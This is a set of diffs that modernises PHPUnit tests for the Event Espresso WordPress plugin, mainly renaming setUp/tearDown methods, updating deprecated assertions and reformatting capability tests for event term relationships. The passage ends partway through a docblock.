-        parent::setUp();
+        parent::set_up();
         //register it for realz
         EE_Register_Model::register(
             'Mock',
@@ -34,20 +34,20 @@ class EE_Base_Class_Test extends EE_UnitTestCase
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         EE_Register_Model::deregister('Mock');
-        parent::tearDown();
+        parent::tear_down();
     }
 
-    static function setUpBeforeClass()
+    public static function set_up_before_class()
     {
         //		EEH_Activation::create_table('esp_mock',
         //				"MCK_ID int(11) NOT NULL,
         //				PRIMARY KEY  (MCK_ID)");
         //		require_once(EE_TESTS_DIR.'mocks/core/db_models/EEM_Mock.model.php');
         //		require_once(EE_TESTS_DIR.'mocks/core/db_classes/EE_Mock.class.php');
-        parent::setUpBeforeClass();
+        parent::set_up_before_class();
     }
 
 

--- a/tests/testcases/core/db_classes/EE_Import_Test.php
+++ b/tests/testcases/core/db_classes/EE_Import_Test.php
@@ -397,8 +397,9 @@ class EE_Import_Test extends EE_UnitTestCase {
 //		//check
 //	}
 
-	public function setUp(){
-		parent::setUp();
+	public function set_up()
+{
+		parent::set_up();
 		EE_Import::reset();
 	}
 	protected function _assertNoImportErrors(){

--- a/tests/testcases/core/db_classes/EE_Line_Item_Test.php
+++ b/tests/testcases/core/db_classes/EE_Line_Item_Test.php
@@ -28,9 +28,9 @@ class EE_Line_Item_Test extends EE_UnitTestCase
     protected $numeric_utilities;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->numeric_utilities = LoaderFactory::getShared(DecimalValues::class);
     }
 

--- a/tests/testcases/core/db_classes/EE_Message_Template_Group_Test.php
+++ b/tests/testcases/core/db_classes/EE_Message_Template_Group_Test.php
@@ -19,9 +19,9 @@ class EE_Message_Template_Group_Test extends EE_UnitTestCase
      */
     private $message_template_group;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->message_template_group = EEM_Message_Template_Group::instance()->get_one(
             array(
                 array(
@@ -33,9 +33,9 @@ class EE_Message_Template_Group_Test extends EE_UnitTestCase
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         $this->message_template_group = null;
     }
 

--- a/tests/testcases/core/db_classes/EE_Message_Template_Group_Test.php
+++ b/tests/testcases/core/db_classes/EE_Message_Template_Group_Test.php
@@ -53,11 +53,9 @@ class EE_Message_Template_Group_Test extends EE_UnitTestCase
     }
 
 
-    /**
-     * @expectedException EventEspresso\core\exceptions\InvalidIdentifierException
-     */
     public function testInvalidContextTemplateForIsContextActive()
     {
+        $this->setExceptionExpected('EventEspresso\core\exceptions\InvalidIdentifierException');
         $this->message_template_group->is_context_active('bogus');
     }
 
@@ -80,20 +78,16 @@ class EE_Message_Template_Group_Test extends EE_UnitTestCase
     }
 
 
-    /**
-     * @expectedException EventEspresso\core\exceptions\InvalidIdentifierException
-     */
     public function testActivatingInvalidContext()
     {
+        $this->setExceptionExpected('EventEspresso\core\exceptions\InvalidIdentifierException');
         $this->message_template_group->deactivate_context('bogus');
     }
 
 
-    /**
-     * @expectedException EventEspresso\core\exceptions\InvalidIdentifierException
-     */
     public function testDeactivatingInvalidContext()
     {
+        $this->setExceptionExpected('EventEspresso\core\exceptions\InvalidIdentifierException');
         $this->message_template_group->activate_context('bogus');
     }
 }

--- a/tests/testcases/core/db_classes/EE_Payment_Test.php
+++ b/tests/testcases/core/db_classes/EE_Payment_Test.php
@@ -81,12 +81,12 @@ class EE_Payment_Test extends EE_UnitTestCase{
 		$redirect_args = array( 'arg1' => 'a', 'arg2' => 'b' );
 		$p = $this->new_model_obj_with_dependencies( 'Payment', array( 'PAY_redirect_url' => $redirect_url, 'PAY_redirect_args' => $redirect_args ) );
 		$html_form = $p->redirect_form();
-		$this->assertContains(
+		$this->assertStringContainsString(
 			'<form method="POST" name="gateway_form" action="' . $redirect_url . '">',
 			$html_form
 		);
 		foreach( $redirect_args as $name => $value ) {
-			$this->assertContains(
+			$this->assertStringContainsString(
 				'<input type="hidden" name="' . $name . '" value="' . esc_attr( $value ) . '"/>',
 				$html_form
 			);
@@ -107,13 +107,15 @@ class EE_Payment_Test extends EE_UnitTestCase{
 			)
 		);
 		$html_form = $p->redirect_form();
-		$this->assertContains(
+		$this->assertStringContainsString(
 			'<form method="GET" name="gateway_form" action="' . $redirect_url . '">',
-			$html_form );
+			$html_form
+        );
 		foreach( $redirect_args as $name => $value ) {
-			$this->assertContains(
+			$this->assertStringContainsString(
 				'<input type="hidden" name="' . $name . '" value="' . esc_attr( $value ) . '"/>',
-				$html_form);
+				$html_form
+            );
 		}
 	}
 }

--- a/tests/testcases/core/db_classes/EE_Ticket_Test.php
+++ b/tests/testcases/core/db_classes/EE_Ticket_Test.php
@@ -133,10 +133,10 @@ class EE_Ticket_Test extends EE_UnitTestCase
 
     /**
      * @group 10283
-     * @expectedException \EventEspresso\core\exceptions\UnexpectedEntityException
      */
     public function test_get_related_event_exception()
     {
+        $this->setExceptionExpected('EventEspresso\core\exceptions\UnexpectedEntityException');
         //create a ticket (it won't have any datetime).
         /** @var EE_Ticket $ticket */
         $ticket = $this->factory->ticket->create();

--- a/tests/testcases/core/db_models/EEM_Answer_Test.php
+++ b/tests/testcases/core/db_models/EEM_Answer_Test.php
@@ -30,9 +30,9 @@ class EEM_Answer_Test extends EE_UnitTestCase{
      * @throws \EventEspresso\core\exceptions\InvalidDataTypeException
      * @throws \EventEspresso\core\exceptions\InvalidInterfaceException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->model = EEM_Answer::instance();
     }
 

--- a/tests/testcases/core/db_models/EEM_Base_Using_Mock_Model_Test.php
+++ b/tests/testcases/core/db_models/EEM_Base_Using_Mock_Model_Test.php
@@ -15,9 +15,9 @@ defined('EVENT_ESPRESSO_VERSION') || exit;
 class EEM_Base_Using_Mock_Model_Test extends EE_UnitTestCase
 {
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_stop_pretending_addon_hook_time();
         $this->_pretend_addon_hook_time();
         $this->assertArrayDoesNotContain('EEM_Mock', EE_Registry::instance()->non_abstract_db_models);
@@ -150,14 +150,14 @@ class EEM_Base_Using_Mock_Model_Test extends EE_UnitTestCase
 
 
 
-    public function tearDown()
+    public function tear_down()
     {
         EE_Register_Model::deregister('Mock');
         EE_System::instance()->load_core_configuration();
         $this->assertArrayDoesNotContain('EEM_Mock', EE_Registry::instance()->non_abstract_db_models);
         $this->assertArrayDoesNotContain('EEM_Mock', EE_Registry::instance()->models);
         $this->_stop_pretending_addon_hook_time();
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/EEM_Datetime_Test.php
+++ b/tests/testcases/core/db_models/EEM_Datetime_Test.php
@@ -484,7 +484,7 @@ class EEM_Datetime_Test extends EE_UnitTestCase {
 	public function test_get_datetime_counts_by_status_and_get_datetime_count_for_status() {
 
 	    $existing_datetimes = EEM_Datetime::instance()->get_all();
-        $this->assertInternalType('array', $existing_datetimes);
+        $this->assertIsArray($existing_datetimes);
         $this->assertCount(0, $existing_datetimes);
 		//setup some datetimes for testing with
 		$upcoming_datetimes = $this->factory->datetime->create_many(5);

--- a/tests/testcases/core/db_models/EEM_Datetime_Test.php
+++ b/tests/testcases/core/db_models/EEM_Datetime_Test.php
@@ -16,17 +16,17 @@
  */
 class EEM_Datetime_Test extends EE_UnitTestCase {
 
-    public function setUp() {
-        parent::setUp();
+    public function set_up() {
+        parent::set_up();
         //set timezone string.  NOTE, this is purposely a high positive timezone string because it works better for testing expiry times.
         update_option( 'timezone_string', 'Australia/Sydney' );
     }
 
 
-	public function tearDown(){
+	public function tear_down(){
 		//restore the timezone string to the default
 		update_option( 'timezone_string', '' );
-		parent::tearDown();
+		parent::tear_down();
 	}
 
 

--- a/tests/testcases/core/db_models/EEM_Event_Test.php
+++ b/tests/testcases/core/db_models/EEM_Event_Test.php
@@ -21,17 +21,17 @@ use EventEspresso\core\exceptions\InvalidInterfaceException;
 class EEM_Event_Test extends EE_UnitTestCase {
 
 
-    public function setUp() {
-        parent::setUp();
+    public function set_up() {
+        parent::set_up();
         //set timezone string.  NOTE, this is purposely a high positive timezone string because it works better for testing expiry times.
         update_option( 'timezone_string', 'Australia/Sydney' );
     }
 
 
-	public function tearDown() {
+	public function tear_down() {
 		//restore the timezone string to the default
 		update_option( 'timezone_string', '' );
-		parent::tearDown();
+		parent::tear_down();
 	}
 
 

--- a/tests/testcases/core/db_models/EEM_Extra_Join_Test.php
+++ b/tests/testcases/core/db_models/EEM_Extra_Join_Test.php
@@ -15,9 +15,9 @@ if (! defined('EVENT_ESPRESSO_VERSION')) {
 class EEM_Extra_Join_Test extends EE_UnitTestCase
 {
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         //for the testing's sake, we want events to be related to payment methods via a HABTM_Any relation
         add_filter('FHEE__EEM_Event__construct__model_relations', array($this, 'relate_events_to_payment_methods'));
         add_filter('FHEE__EEM_Payment_Method__construct__model_relations',
@@ -29,9 +29,9 @@ class EEM_Extra_Join_Test extends EE_UnitTestCase
         EEM_Payment_Method::reset();
     }
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         // reset those models so they don't adversely affect other tests
         EEM_Event::reset();
         EEM_Payment_Method::reset();

--- a/tests/testcases/core/db_models/EEM_Extra_Join_Test.php
+++ b/tests/testcases/core/db_models/EEM_Extra_Join_Test.php
@@ -1,8 +1,4 @@
 <?php
-if (! defined('EVENT_ESPRESSO_VERSION')) {
-    exit('No direct script access allowed');
-}
-
 
 /**
  * Class EEM_Extra_Join_Test
@@ -15,13 +11,19 @@ if (! defined('EVENT_ESPRESSO_VERSION')) {
 class EEM_Extra_Join_Test extends EE_UnitTestCase
 {
 
+    /**
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
     public function set_up()
     {
         parent::set_up();
-        //for the testing's sake, we want events to be related to payment methods via a HABTM_Any relation
-        add_filter('FHEE__EEM_Event__construct__model_relations', array($this, 'relate_events_to_payment_methods'));
-        add_filter('FHEE__EEM_Payment_Method__construct__model_relations',
-            array($this, 'relate_payment_methods_to_events'));
+        // for the testing's sake, we want events to be related to payment methods via a HABTM_Any relation
+        add_filter('FHEE__EEM_Event__construct__model_relations', [$this, 'relate_events_to_payment_methods']);
+        add_filter(
+            'FHEE__EEM_Payment_Method__construct__model_relations',
+            [$this, 'relate_payment_methods_to_events']
+        );
         // do another reset on the registry now
         EE_Registry::reset(true);
         // then reload those models so those filters take effect
@@ -29,6 +31,11 @@ class EEM_Extra_Join_Test extends EE_UnitTestCase
         EEM_Payment_Method::reset();
     }
 
+
+    /**
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
     public function tear_down()
     {
         parent::tear_down();
@@ -60,58 +67,60 @@ class EEM_Extra_Join_Test extends EE_UnitTestCase
     }
 
 
-
     /**
+     * @throws EE_Error
+     * @throws ReflectionException
      * @group 9113
      */
     public function test_get_related()
     {
-        $e = $this->new_model_obj_with_dependencies('Event');
-        $pm = $this->new_model_obj_with_dependencies('Payment_Method', array('PMD_type' => 'Invoice'));
+        $e  = $this->new_model_obj_with_dependencies('Event');
+        $pm = $this->new_model_obj_with_dependencies('Payment_Method', ['PMD_type' => 'Invoice']);
         //add a few extra events and payment methods, just to make sure we are
         //only relating the things we intended
         $this->new_model_obj_with_dependencies('Event');
-        $this->new_model_obj_with_dependencies('Payment_Method', array('PMD_type' => 'Invoice'));
+        $this->new_model_obj_with_dependencies('Payment_Method', ['PMD_type' => 'Invoice']);
         $this->new_model_obj_with_dependencies(
             'Extra_Join',
-            array(
+            [
                 'EXJ_first_model_ID'    => $e->ID(),
                 'EXJ_first_model_name'  => 'Event',
                 'EXJ_second_model_ID'   => $pm->ID(),
                 'EXJ_second_model_name' => 'Payment_Method',
-            )
+            ]
         );
-        $this->assertEquals(array($pm->ID() => $pm), $e->get_many_related('Payment_Method'));
-        $this->assertEquals(array($e->ID() => $e), $pm->get_many_related('Event'));
+        $this->assertEquals([$pm->ID() => $pm], $e->get_many_related('Payment_Method'));
+        $this->assertEquals([$e->ID() => $e], $pm->get_many_related('Event'));
     }
 
 
     /**
+     * @throws EE_Error
+     * @throws ReflectionException
      * @group 9113
      */
     public function test_add()
     {
-        $e = $this->new_model_obj_with_dependencies('Event');
-        $pm = $this->new_model_obj_with_dependencies('Payment_Method', array('PMD_type' => 'Invoice'));
+        $e  = $this->new_model_obj_with_dependencies('Event');
+        $pm = $this->new_model_obj_with_dependencies('Payment_Method', ['PMD_type' => 'Invoice']);
         $e->_add_relation_to($pm, 'Payment_Method');
-        $this->assertEquals(array($pm->ID() => $pm), $e->get_many_related('Payment_Method'));
+        $this->assertEquals([$pm->ID() => $pm], $e->get_many_related('Payment_Method'));
     }
 
 
-
     /**
+     * @throws EE_Error
+     * @throws ReflectionException
      * @group 9113
      */
     public function test_delete()
     {
-        $e = $this->new_model_obj_with_dependencies('Event');
-        $pm = $this->new_model_obj_with_dependencies('Payment_Method', array('PMD_type' => 'Invoice'));
+        $e  = $this->new_model_obj_with_dependencies('Event');
+        $pm = $this->new_model_obj_with_dependencies('Payment_Method', ['PMD_type' => 'Invoice']);
         $e->_add_relation_to($pm, 'Payment_Method');
-        $this->assertEquals(array($pm->ID() => $pm), $e->get_many_related('Payment_Method'));
+        $this->assertEquals([$pm->ID() => $pm], $e->get_many_related('Payment_Method'));
         $e->_remove_relation_to($pm, 'Payment_Method');
-        $this->assertEquals(array(), $e->get_many_related('Payment_Method'));
+        $this->assertEquals([], $e->get_many_related('Payment_Method'));
     }
-
 }
-
 // Location: testcases/core/db_models/EEM_Extra_Join_Test.php

--- a/tests/testcases/core/db_models/EEM_Payment_Test.php
+++ b/tests/testcases/core/db_models/EEM_Payment_Test.php
@@ -11,20 +11,20 @@ class EEM_Payment_Test extends EE_UnitTestCase
 {
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         //set timezone string.  NOTE, this is purposely a high positive timezone string because it works better for testing expiry times.
         update_option('timezone_string', 'Australia/Sydney');
     }
 
 
 
-    public function tearDown()
+    public function tear_down()
     {
         //restore the timezone string to the default
         update_option('timezone_string', '');
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/EEM_Price_Caps_Test.php
+++ b/tests/testcases/core/db_models/EEM_Price_Caps_Test.php
@@ -87,8 +87,8 @@ class EEM_Price_Caps_Test extends EE_UnitTestCase{
 	 * @var EE_Event
 	 */
 	public $e_private;
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		//let's make sure we start off with NO tickets in the DB
 		EEM_Price::instance()->delete_permanently( EEM_Price::instance()->alter_query_params_so_deleted_and_undeleted_items_included(), false );
 		$this->assertEquals( 0, EEM_Price::instance()->count( EEM_Price::instance()->alter_query_params_so_deleted_and_undeleted_items_included() ) );

--- a/tests/testcases/core/db_models/EEM_Registration_Test.php
+++ b/tests/testcases/core/db_models/EEM_Registration_Test.php
@@ -18,17 +18,17 @@
 class EEM_Registration_Test extends EE_UnitTestCase {
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
         //set timezone string.  NOTE, this is purposely a high positive timezone string because it works better for testing expiry times.
         update_option( 'timezone_string', 'Australia/Sydney' );
 	}
 
 
-	public function tearDown() {
+	public function tear_down() {
 		//restore the timezone string to the default
 		update_option( 'timezone_string', '' );
-		parent::tearDown();
+		parent::tear_down();
 	}
 
 

--- a/tests/testcases/core/db_models/EEM_Term_Caps_Test.php
+++ b/tests/testcases/core/db_models/EEM_Term_Caps_Test.php
@@ -29,8 +29,8 @@ class EEM_Term_Caps_Test extends EE_UnitTestCase{
 	 */
 	public $venue_term;
 
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		$this->event_term = $this->new_model_obj_with_dependencies('Term' );
 		$this->new_model_obj_with_dependencies( 'Term_Taxonomy', array(
 			'term_id' => $this->event_term->ID(),

--- a/tests/testcases/core/db_models/EEM_Term_Relationship_Caps_Test.php
+++ b/tests/testcases/core/db_models/EEM_Term_Relationship_Caps_Test.php
@@ -39,8 +39,8 @@ class EEM_Term_Relationship_Caps_Test extends EE_UnitTestCase {
 	 */
 	public $user = null;
 	//don't bother with a private term relationship.
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		$this->user = $this->factory->user->create_and_get();
 		$this->my_event = $this->new_model_obj_with_dependencies( 'Event', array( 'EVT_wp_user' => $this->user->ID ) );
 		$term_id_and_taxonomy_id = wp_insert_term('term_r_for_my_event', 'espresso_event_categories' );

--- a/tests/testcases/core/db_models/EEM_Term_Relationship_Caps_Test.php
+++ b/tests/testcases/core/db_models/EEM_Term_Relationship_Caps_Test.php
@@ -1,238 +1,296 @@
 <?php
-if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
-	exit( 'No direct script access allowed' );
-}
 
 /**
  *
  * EEM_Term_Relationship_Caps_Test
  *
- * @package			Event Espresso
+ * @package               Event Espresso
  * @subpackage
- * @author				Mike Nelson
+ * @author                Mike Nelson
  *
  */
-class EEM_Term_Relationship_Caps_Test extends EE_UnitTestCase {
-	/**
-	 *
-	 * @var EE_Term_Relationship
-	 */
-	public $term_r_for_my_event = null;
-	/**
-	 *
-	 * @var EE_Term_Relationship
-	 */
-	public $term_r_for_others_event = null;
-	/**
-	 *
-	 * @var EE_Event
-	 */
-	public $my_event = null;
+class EEM_Term_Relationship_Caps_Test extends EE_UnitTestCase
+{
+    /**
+     *
+     * @var EE_Term_Relationship
+     */
+    public $term_r_for_my_event = null;
 
-	/**
-	 * @var EE_Event
-	 */
-	public $others_event = null;
-	/**
-	 *
-	 * @var WP_User
-	 */
-	public $user = null;
-	//don't bother with a private term relationship.
-	public function set_up(){
-		parent::set_up();
-		$this->user = $this->factory->user->create_and_get();
-		$this->my_event = $this->new_model_obj_with_dependencies( 'Event', array( 'EVT_wp_user' => $this->user->ID ) );
-		$term_id_and_taxonomy_id = wp_insert_term('term_r_for_my_event', 'espresso_event_categories' );
-		$result = wp_set_object_terms( $this->my_event->ID(), $term_id_and_taxonomy_id['term_id'], 'espresso_event_categories' );
-		$this->term_r_for_my_event = EEM_Term_Relationship::instance()->get_one(
-				array(
-					array(
-						'object_id' => $this->my_event->ID(),
-						'term_taxonomy_id' => reset( $result )
-						)
-					)
-				);
+    /**
+     *
+     * @var EE_Term_Relationship
+     */
+    public $term_r_for_others_event = null;
 
-		$this->others_event = $this->new_model_obj_with_dependencies( 'Event', array( 'EVT_wp_user' => $this->user->ID + 1 ) );
-		$term_id_and_taxonomy_id = wp_insert_term('term_r_for_others_event', 'espresso_event_categories' );
-		$result = wp_set_object_terms( $this->others_event->ID(), $term_id_and_taxonomy_id['term_id'], 'espresso_event_categories' );
-		$this->term_r_for_others_event = EEM_Term_Relationship::instance()->get_one(
-				array(
-					array(
-						'object_id' => $this->others_event->ID(),
-						'term_taxonomy_id' => reset( $result )
-						)
-					)
-				);
+    /**
+     *
+     * @var EE_Event
+     */
+    public $my_event = null;
+
+    /**
+     * @var EE_Event
+     */
+    public $others_event = null;
+
+    /**
+     *
+     * @var WP_User
+     */
+    public $user = null;
 
 
-	}
+    /**
+     * don't bother with a private term relationship.
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
+    public function set_up()
+    {
+        parent::set_up();
+        $this->user                = $this->factory->user->create_and_get();
+        $this->my_event            = $this->new_model_obj_with_dependencies(
+            'Event',
+            ['EVT_wp_user' => $this->user->ID]
+        );
+        $term_id_and_taxonomy_id   = wp_insert_term('term_r_for_my_event', 'espresso_event_categories');
+        $result                    = wp_set_object_terms(
+            $this->my_event->ID(),
+            $term_id_and_taxonomy_id['term_id'],
+            'espresso_event_categories'
+        );
+        $this->term_r_for_my_event = EEM_Term_Relationship::instance()->get_one(
+            [
+                [
+                    'object_id'        => $this->my_event->ID(),
+                    'term_taxonomy_id' => reset($result),
+                ],
+            ]
+        );
 
-	public function test_get_all__caps__read(){
-		$term_rs = EEM_Term_Relationship::instance()->get_all(
-				array(
-					array(
-						'object_id' => array( 'IN', array( $this->my_event->ID(), $this->others_event->ID() ) )
-						),
-					'order_by' => array( 'object_id' => 'ASC' ),
-					)
-				);
-		$this->assertEEModelObjectsEquals( $this->term_r_for_my_event, reset( $term_rs ) );
-		$this->assertEEModelObjectsEquals( $this->term_r_for_others_event, next( $term_rs ) );
-		$this->assertEquals( 2, count( $term_rs ) );
-	}
-
-	/**
-	 * if you're not logged in, you shouldn't be able to see any of this in the admin context
-	 */
-	public function test_get_all_read_admin__no_caps() {
-		$term_rs = EEM_Term_Relationship::instance()->get_all(
-				array(
-					array(
-						'object_id' => array( 'IN', array( $this->my_event->ID(), $this->others_event->ID() ) )
-						),
-					'order_by' => array( 'object_id' => 'ASC' ),
-					'caps' => EEM_Base::caps_read_admin
-					)
-				);
-		$this->assertEquals( 0, count( $term_rs ) );
-	}
-
-	/**
-	 * currently, you don't need "ee_assign_event_categories" to READ term relationships in the admin
-	 */
-	public function test_get_all__caps__read_admin__my_own(){
-		//log the user in
-		global $current_user;
-		$current_user = $this->user;
-		$current_user->add_cap( 'ee_read_events' );
-
-		//now check they can only see the term relationship for their own event
-		$term_rs = EEM_Term_Relationship::instance()->get_all(
-				array(
-					array(
-						'object_id' => array( 'IN', array( $this->my_event->ID(), $this->others_event->ID() ) )
-						),
-					'order_by' => array( 'object_id' => 'ASC' ),
-					'caps' => EEM_Base::caps_read_admin
-					)
-				);
-		$this->assertEEModelObjectsEquals( $this->term_r_for_my_event, reset( $term_rs ) );
-		$this->assertEquals( 1, count( $term_rs ) );
-	}
-
-	public function test_get_all__caps__read_admin__others(){
-		//log the user in
-		global $current_user;
-		$current_user = $this->user;
-		$current_user->add_cap( 'ee_read_events' );
-		$current_user->add_cap( 'ee_read_others_events' );
-
-		//now check they can only see the term relationship for their own event
-		$term_rs = EEM_Term_Relationship::instance()->get_all(
-				array(
-					array(
-						'object_id' => array( 'IN', array( $this->my_event->ID(), $this->others_event->ID() ) )
-						),
-					'order_by' => array( 'object_id' => 'ASC' ),
-					'caps' => EEM_Base::caps_read_admin
-					)
-				);
-		$this->assertEEModelObjectsEquals( $this->term_r_for_my_event, reset( $term_rs ) );
-		$this->assertEEModelObjectsEquals( $this->term_r_for_others_event, next( $term_rs ) );
-		$this->assertEquals( 2, count( $term_rs ) );
-	}
-
-	/**
-	 * you need the "ee_assign_event_categories" too, in order to edit any event categories
-	 */
-	public function test_get_all__caps__edit__no_assign_event_category(){
-		//log the user in
-		global $current_user;
-		$current_user = $this->user;
-		$current_user->add_cap( 'ee_edit_events' );
-
-		//now check they can only see the term relationship for their own event
-		$term_rs = EEM_Term_Relationship::instance()->get_all(
-				array(
-					array(
-						'object_id' => array( 'IN', array( $this->my_event->ID(), $this->others_event->ID() ) )
-						),
-					'order_by' => array( 'object_id' => 'ASC' ),
-					'caps' => EEM_Base::caps_edit
-					)
-				);
-		$this->assertEquals( 0, count( $term_rs ) );
-	}
-
-	public function test_get_all__caps__edit__with_assign_event_category(){
-		//log the user in
-		global $current_user;
-		$current_user = $this->user;
-		$current_user->add_cap( 'ee_edit_events' );
-		$current_user->add_cap( 'ee_assign_event_category' );
-		$term_rs = EEM_Term_Relationship::instance()->get_all(
-				array(
-					array(
-						'object_id' => array( 'IN', array( $this->my_event->ID(), $this->others_event->ID() ) )
-						),
-					'order_by' => array( 'object_id' => 'ASC' ),
-					'caps' => EEM_Base::caps_edit
-					)
-				);
-		$this->assertEEModelObjectsEquals( $this->term_r_for_my_event, reset( $term_rs ) );
-		$this->assertEquals( 1, count( $term_rs ) );
-	}
+        $this->others_event            = $this->new_model_obj_with_dependencies(
+            'Event',
+            ['EVT_wp_user' => $this->user->ID + 1]
+        );
+        $term_id_and_taxonomy_id       = wp_insert_term('term_r_for_others_event', 'espresso_event_categories');
+        $result                        = wp_set_object_terms(
+            $this->others_event->ID(),
+            $term_id_and_taxonomy_id['term_id'],
+            'espresso_event_categories'
+        );
+        $this->term_r_for_others_event = EEM_Term_Relationship::instance()->get_one(
+            [
+                [
+                    'object_id'        => $this->others_event->ID(),
+                    'term_taxonomy_id' => reset($result),
+                ],
+            ]
+        );
+    }
 
 
-
-	/**
-	 * you need the "ee_assign_event_categories" too, in order to edit any event categories
-	 */
-	public function test_get_all__caps__delete__no_assign_event_category(){
-		//log the user in
-		global $current_user;
-		$current_user = $this->user;
-		$current_user->add_cap( 'ee_edit_events' );
-
-		//now check they can only see the term relationship for their own event
-		$term_rs = EEM_Term_Relationship::instance()->get_all(
-				array(
-					array(
-						'object_id' => array( 'IN', array( $this->my_event->ID(), $this->others_event->ID() ) )
-						),
-					'order_by' => array( 'object_id' => 'ASC' ),
-					'caps' => EEM_Base::caps_delete
-					)
-				);
-		$this->assertEquals( 0, count( $term_rs ) );
-	}
-
-	public function test_get_all__caps__delete__with_assign_event_category(){
-		//log the user in
-		global $current_user;
-		$current_user = $this->user;
-		$current_user->add_cap( 'ee_edit_events' );
-		$current_user->add_cap( 'ee_assign_event_category' );
-
-		//now check they can only see the term relationship for their own event
-		$term_rs = EEM_Term_Relationship::instance()->get_all(
-				array(
-					array(
-						'object_id' => array( 'IN', array( $this->my_event->ID(), $this->others_event->ID() ) )
-						),
-					'order_by' => array( 'object_id' => 'ASC' ),
-					'caps' => EEM_Base::caps_delete
-					)
-				);
-		$this->assertEEModelObjectsEquals( $this->term_r_for_my_event, reset( $term_rs ) );
-		$this->assertEquals( 1, count( $term_rs ) );
-	}
+    /**
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
+    public function test_get_all__caps__read()
+    {
+        $term_rs = EEM_Term_Relationship::instance()->get_all(
+            [
+                [
+                    'object_id' => ['IN', [$this->my_event->ID(), $this->others_event->ID()]],
+                ],
+                'order_by' => ['object_id' => 'ASC'],
+            ]
+        );
+        $this->assertEEModelObjectsEquals($this->term_r_for_my_event, reset($term_rs));
+        $this->assertEEModelObjectsEquals($this->term_r_for_others_event, next($term_rs));
+        $this->assertEquals(2, count($term_rs));
+    }
 
 
+    /**
+     * if you're not logged in, you shouldn't be able to see any of this in the admin context
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
+    public function test_get_all_read_admin__no_caps()
+    {
+        $term_rs = EEM_Term_Relationship::instance()->get_all(
+            [
+                [
+                    'object_id' => ['IN', [$this->my_event->ID(), $this->others_event->ID()]],
+                ],
+                'order_by' => ['object_id' => 'ASC'],
+                'caps'     => EEM_Base::caps_read_admin,
+            ]
+        );
+        $this->assertEquals(0, count($term_rs));
+    }
 
 
+    /**
+     * currently, you don't need "ee_assign_event_categories" to READ term relationships in the admin
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
+    public function test_get_all__caps__read_admin__my_own()
+    {
+        //log the user in
+        global $current_user;
+        $current_user = $this->user;
+        $current_user->add_cap('ee_read_events');
+
+        //now check they can only see the term relationship for their own event
+        $term_rs = EEM_Term_Relationship::instance()->get_all(
+            [
+                [
+                    'object_id' => ['IN', [$this->my_event->ID(), $this->others_event->ID()]],
+                ],
+                'order_by' => ['object_id' => 'ASC'],
+                'caps'     => EEM_Base::caps_read_admin,
+            ]
+        );
+        $this->assertEEModelObjectsEquals($this->term_r_for_my_event, reset($term_rs));
+        $this->assertEquals(1, count($term_rs));
+    }
+
+
+    /**
+     * @throws ReflectionException
+     * @throws EE_Error
+     */
+    public function test_get_all__caps__read_admin__others()
+    {
+        //log the user in
+        global $current_user;
+        $current_user = $this->user;
+        $current_user->add_cap('ee_read_events');
+        $current_user->add_cap('ee_read_others_events');
+
+        //now check they can only see the term relationship for their own event
+        $term_rs = EEM_Term_Relationship::instance()->get_all(
+            [
+                [
+                    'object_id' => ['IN', [$this->my_event->ID(), $this->others_event->ID()]],
+                ],
+                'order_by' => ['object_id' => 'ASC'],
+                'caps'     => EEM_Base::caps_read_admin,
+            ]
+        );
+        $this->assertEEModelObjectsEquals($this->term_r_for_my_event, reset($term_rs));
+        $this->assertEEModelObjectsEquals($this->term_r_for_others_event, next($term_rs));
+        $this->assertEquals(2, count($term_rs));
+    }
+
+
+    /**
+     * you need the "ee_assign_event_categories" too, in order to edit any event categories
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
+    public function test_get_all__caps__edit__no_assign_event_category()
+    {
+        //log the user in
+        global $current_user;
+        $current_user = $this->user;
+        $current_user->add_cap('ee_edit_events');
+
+        //now check they can only see the term relationship for their own event
+        $term_rs = EEM_Term_Relationship::instance()->get_all(
+            [
+                [
+                    'object_id' => ['IN', [$this->my_event->ID(), $this->others_event->ID()]],
+                ],
+                'order_by' => ['object_id' => 'ASC'],
+                'caps'     => EEM_Base::caps_edit,
+            ]
+        );
+        $this->assertEquals(0, count($term_rs));
+    }
+
+
+    /**
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
+    public function test_get_all__caps__edit__with_assign_event_category()
+    {
+        //log the user in
+        global $current_user;
+        $current_user = $this->user;
+        $current_user->add_cap('ee_edit_events');
+        $current_user->add_cap('ee_assign_event_category');
+        $term_rs = EEM_Term_Relationship::instance()->get_all(
+            [
+                [
+                    'object_id' => ['IN', [$this->my_event->ID(), $this->others_event->ID()]],
+                ],
+                'order_by' => ['object_id' => 'ASC'],
+                'caps'     => EEM_Base::caps_edit,
+            ]
+        );
+        $this->assertEEModelObjectsEquals($this->term_r_for_my_event, reset($term_rs));
+        $this->assertEquals(1, count($term_rs));
+    }
+
+
+    /**
+     * you need the "ee_assign_event_categories" too, in order to edit any event categories
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
